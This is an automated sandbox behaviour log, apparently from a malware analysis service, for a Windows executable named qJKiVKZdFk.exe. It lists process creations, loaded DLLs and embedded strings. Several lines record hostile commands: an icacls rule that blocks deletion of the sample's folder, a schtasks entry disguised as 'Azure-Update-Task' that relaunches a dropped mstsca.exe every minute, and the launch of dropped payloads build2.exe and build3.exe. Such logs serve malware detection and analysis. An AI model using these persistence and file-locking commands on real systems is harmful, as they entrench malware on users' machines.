            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: --Admin2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: runas2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: x2Q2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: x*P2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: C:\Windows\2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: D:\Windows\2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: 7P2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: %username%2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: F:\2_2_00419F90
            Source: qJKiVKZdFk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: qJKiVKZdFk.exeReversingLabs: Detection: 44%
            Source: qJKiVKZdFk.exeString found in binary or memory: set-addPolicy
            Source: qJKiVKZdFk.exeString found in binary or memory: id-cmc-addExtensions
            Source: qJKiVKZdFk.exeString found in binary or memory: set-addPolicy
            Source: qJKiVKZdFk.exeString found in binary or memory: id-cmc-addExtensions
            Source: qJKiVKZdFk.exeString found in binary or memory: set-addPolicy
            Source: qJKiVKZdFk.exeString found in binary or memory: id-cmc-addExtensions
            Source: qJKiVKZdFk.exeString found in binary or memory: set-addPolicy
            Source: qJKiVKZdFk.exeString found in binary or memory: id-cmc-addExtensions
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile read: C:\Users\user\Desktop\qJKiVKZdFk.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe"
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe"
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTask
            Source: unknownProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe"
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe"
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
            Source: unknownProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe"
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe"Jump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\Desktop\qJKiVKZdFk.exe "C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe" Jump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --TaskJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe"
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeProcess created: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe"
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: drprov.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: ntlanman.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: davclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: davhlpr.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: uxtheme.dll
